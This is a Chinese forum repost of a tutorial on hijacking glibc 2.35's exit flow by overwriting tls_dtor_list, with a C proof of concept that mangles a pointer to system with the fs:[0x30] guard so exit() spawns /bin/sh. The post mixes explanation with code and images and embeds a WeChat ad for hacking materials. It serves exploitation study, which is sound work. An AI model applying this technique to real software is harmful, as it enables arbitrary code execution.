glibc2.35-通过tls_dtor_list劫持exit执行流程

打印 上一主题 下一主题

主题 896|帖子 896|积分 2688

前言

glibc2.35删除了malloc_hook、free_hook以及realloc_hook,通过劫持这三个hook函数执行system已经不可行了。
传统堆漏洞利用是利用任意地址写改上上述几个hook从而执行system,在移除之后则需要找到同样只需要修改某个地址值并且能够造成程序流劫持的效果。
__call_tls_dtors

在程序返回时会通过exit函数,exit函数会经历以下调用过程
  1. exit
  2. ->
  3. __run_exit_handlers
  4. ->
  5. __call_tls_dtors
复制代码
而__call_tls_dtors函数中则存在着可以进行劫持的地址,__call_tls_dtors函数的执行如下:

  • 判断tls_dtor_list为空
  • 不为空则将tls_dtor_list赋值给cur
  • 取出函数指针cur->func
  • 通过PTR_DEMANGLE宏解密指针值
  • 执行函数指针
  1. void
  2. __call_tls_dtors (void)
  3. {
  4.  while (tls_dtor_list)
  5.    {
  6.      struct dtor_list *cur = tls_dtor_list;
  7.      dtor_func func = cur->func;
  8. #ifdef PTR_DEMANGLE
  9.      PTR_DEMANGLE (func);
  10. #endif
  11.      tls_dtor_list = tls_dtor_list->next;
  12.      func (cur->obj);
  13.      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
  14.      free (cur);
  15.    }
  16. }
复制代码
通过上述流程可知,若能够劫持tls_dtor_list,则可以将cur->func指向的位置修改为system函数。具体取出tls_dtor_list的汇编语言如下
[img=720,571.2036336109009]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202309061509397.png[/img]

  • 首先取出tls_dtor_list的下标值,即rbx寄存器的值为0xffffffffffffffa8,转换为十进制为-88
  • 而该下标是用fs进行寻址的,然后取出tls_dtor_list的值判断是否为空

那么假设已经存在任意地址写的漏洞,并且将tls_dtor_list修改为不是空值,看看后续会进入哪些校验流程

首先遇到第一个问题,在后续的流程中需要将tls_dtor_list的内容作为指针值进行索引,因此我们不能够直接将system函数的地址写入tls_dtor_list,而是需要将指向system函数的指针写入。即在堆题中,我们新创建一个堆,并在堆内容写入system函数的地址,然后将堆地址填充到tls_dtor_list中
[img=720,694.6945606694561]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202309061509401.png[/img]
根据上述的方法,我们成功进入后续的流程
[img=720,464.40835266821347]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202309061509402.png[/img]
但是在执行函数执行时,会遇到另一个问题,最后的指针值被修改为乱七八糟的值了。
[img=720,569.2075471698113]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202309061509403.png[/img]
这是因为上述的宏定义PTR_DEMANGLE,需要将函数指针进入一个解密的流程,因此在传递指针值时,需要先传递一个加密后的指针值。解密的流程如下,
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
先将指针循环右移0x11,然后与fs:[0x30]进行异或。循环右移比较好解决,先将指针循环左移即可。但是这个异或值则需要获得fs:[0x30]的值。
  1.   0x7ffff7c45d88 <__call_tls_dtors+40>    ror    rax, 0x11
  2.   0x7ffff7c45d8c <__call_tls_dtors+44>    xor    rax, qword ptr fs:[0x30]
复制代码
也可以看到这个值是一个八字节的随机值,因此通过爆破获得的可能性不大。

那么该攻击方法需要的一个要求就是能够获得该随机值或者能够篡改该值。需要注意点是指针值是先循环右移在异或,因此在加密指针时需要先异或在循环左移。那么解决上述问题之后就能够正确调用地址了,此时就应该考虑该函数指针需要如何传参。可以看到下图,rdi寄存器是通过我们传入的指针值作为基地址进行寻址的,只需要在偏移加8的位置填充/bin/sh的地址值即可。
[img=720,135.7068062827225]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202309061509405.png[/img]
POC
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. unsigned long long rotate_left(unsigned long long value, int left)
  5. {
  6.     return (value << left) | (value >> (sizeof(unsigned long long) * 8 - left));
  7. }
  8. int main() {
  9.    unsigned long long fs_base;
  10.    unsigned long long index = 0xffffffffffffffa8;
  11.    unsigned long long tls_dtor_list_addr;
  12.    unsigned long long random_number;
  13.    void *system_ptr = (void *)&system;
  14.    printf("system:%p\n",system_ptr);
  15.    // 使用汇编嵌入获取FS寄存器的值
  16.    asm("mov %%fs:0, %0" : "=r" (fs_base));
  17.    printf("Value in FS register: 0x%llx\n", fs_base);
  18.    tls_dtor_list_addr = fs_base - 88;
  19.    random_number = *(unsigned long long *)(fs_base + 0x30);
  20.    char *str_bin_sh = malloc(0x20);
  21.    strcpy(str_bin_sh,"/bin/sh");
  22.    void *ptr = malloc(0x20);
  23.    *(unsigned long long *)ptr = rotate_left((unsigned long long)system_ptr ^ random_number,0x11);
  24.    *(unsigned long long *)(ptr + 8)  = str_bin_sh;
  25.    *(unsigned long long *)tls_dtor_list_addr = ptr;
  26.    return 0;
  27. }
复制代码
总结

简单总结一下通过tls_dtor_list劫持exit执行流程的条件

  • 存在任意地址写的漏洞利用
  • 能够篡改或泄露fs_base + 0x30的值
  • 程序会通过exit函数结束程序,若是通过_exit则不行
更多网安技能的在线实操练习,请点击这里>>
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

科技颠覆者

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表